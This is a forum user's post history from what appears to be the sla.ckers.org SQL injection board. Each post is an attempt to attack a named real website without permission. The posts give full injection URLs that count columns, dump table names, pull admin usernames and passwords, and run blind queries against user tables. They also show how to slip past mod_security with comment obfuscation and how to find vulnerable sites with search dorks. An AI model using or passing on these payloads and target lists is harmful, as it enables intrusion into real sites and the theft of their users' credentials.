Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 1
Results 1 - 26 of 26
3 months ago
tascio
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.piemontfungo.com/home/store/index.php on line 91 but this error tell me is a mysql db not a mssql? o_O? i dont understand ?_?
Forum: SQL and Code Injection
3 months ago
tascio
http://www.recreatingeden.com/index.php?pid=8+order+by+5--+ i dont have permission ?_?
Forum: SQL and Code Injection
3 months ago
tascio
order by and union all select works but injections to retrieve data not^^ why? http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29
Forum: SQL and Code Injection
3 months ago
tascio
omg i need to remember some sqlinj^^ http://www.pubblicitafaidate.it/index.php?prod=96
Forum: SQL and Code Injection
3 months ago
tascio
http://www.geldue.it/site/index.php?prod=1&cat=Prodotti%20Complementari%27 help
Forum: SQL and Code Injection
3 months ago
tascio
try writing a generic word and 1 specific url like this: sport shopping "index.php?id=" he will search sites with index.php?id= in url that contain sport shopping words in texts site (obvius, specific text between quotes) no vuln site founded? u can change for variable for example: sport shopping "index.php?product_id=" and google will show u others sport shop
Forum: SQL and Code Injection
9 months ago
tascio
see exploit-db.com
Forum: SQL and Code Injection
10 months ago
tascio
is possible 1 xss? http://www.wowsoc.org/devzone/?assigned=here%20xss?
Forum: CSRF and Session Info
10 months ago
tascio
anyway it's a blind sql inj :P
Forum: SQL and Code Injection
10 months ago
tascio
this is the blind injection http://www.aeroporto.catania.it/page.php?cPath=9999%20and%20%28select%20substring%28concat%281,id%29,1,1%29%20from%20users%20limit%200,1%29=1 i just found id, name and active. username and password :((
Forum: SQL and Code Injection
10 months ago
tascio
sometimes acunetix wrong if havij cant then acunetix got a false positive
Forum: SQL and Code Injection
10 months ago
tascio
try this syntax union all select 1,2,group_concat(admin,password),4,5 from users un can add special chars for an easier reading union all select 1,2,group_concat(admin,0x23,password,0x20),4,5 from users like this http://www.gallina.it/it/prodotti/index.php?prod=999+union+all+select+1,2,3,4,5,group_concat(co_nome,0x23,co_password,0x20),7,8,9,10,11,12,13+from+utenti i added special char
Forum: SQL and Code Injection
10 months ago
tascio
uhm open a new topic for this http://www.yubet.ca/item.php?id=117 it's curious http://www.yubet.ca/item.php?id=117+group+by+64-- no error http://www.yubet.ca/item.php?id=117+group+by+65-- db error then there are 64 fields in union select ?_?_? :O http://www.yubet.ca/item.php?id=99999+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
Forum: SQL and Code Injection
10 months ago
tascio
for the first question: http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+6 show us the product http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+7 show us the product http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+8 dont show us the product then our union select have 7 fields for the columns, use havij just for help but dont care abo
Forum: SQL and Code Injection
10 months ago
tascio
to bypass mod_security u just should enclose the only MySql commands between /*! */ oh many similar websites :D, if u have any problem post post! are usefull also to me to learn more :D
Forum: SQL and Code Injection
10 months ago
tascio
yessss ------> http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7 <------ http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,group_concat(/*!table_name*/),5,6,7+from+/*!inforMAtion_schema*/.tables+/*!wHEre*/+/*!taBLe_scheMA*/like+database() was a pleasure :), my first mod_security injection :)))
Forum: SQL and Code Injection
10 months ago
tascio
this is the url that use that fucking op havij http://comm.icpdas-usa.com//products.php?PID=999999.9+%2F*!30000union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536*%2F-- to extract db name, but is so hard to understand o_O never did a query so pro :D
Forum: SQL and Code Injection
10 months ago
tascio
it's a nice problem :S i tried this http://comm.icpdas-usa.com/products.php?PID=348+/*!/**/aND/**/*/+1/*!=*/1 and seems to work, if u change and 1=2 the page turn blank now i'm working for the union select
Forum: SQL and Code Injection
10 months ago
tascio
and for this? http://itnet.dyndns.biz/sogeiweb/login.aspx i couldn't try your injection cuz that page not exist more^^
Forum: SQL and Code Injection
10 months ago
tascio
i tried with havij, it seems a false positive cuz dont work
Forum: SQL and Code Injection
10 months ago
tascio
http://www.exploit-db.com/papers/17934/ it's work, i tried
Forum: SQL and Code Injection
10 months ago
tascio
this is vuln to sql inj http://www.aeroporto.catania.it/page.php?cPath=24 havij can inject in blind mode but if i try something like order by or group by, or an union manually i get this error Fatal error: Call to undefined method DB_Error::fetchRow() in /opt/www/aeroporto.catania.it/page.php on line 17 what injection have to learn to bypass this error?
Forum: SQL and Code Injection
10 months ago
tascio
ok nice tutorial, i tried but seems to be a false positive cuz dont work
Forum: SQL and Code Injection
10 months ago
tascio
10 months ago
tascio
my acunetix found this vulns in thus url http://www.sicilcanapa.it/order.php?back=order.php?step=1 but i dont know how it works
Forum: SQL and Code Injection
1 year ago
tascio
hi guys, this is my first aspx injection and i need some help http://www.nti.it/interventi/login.aspx maybe is unhackable?
Forum: SQL and Code Injection
Current Page: 1 of 1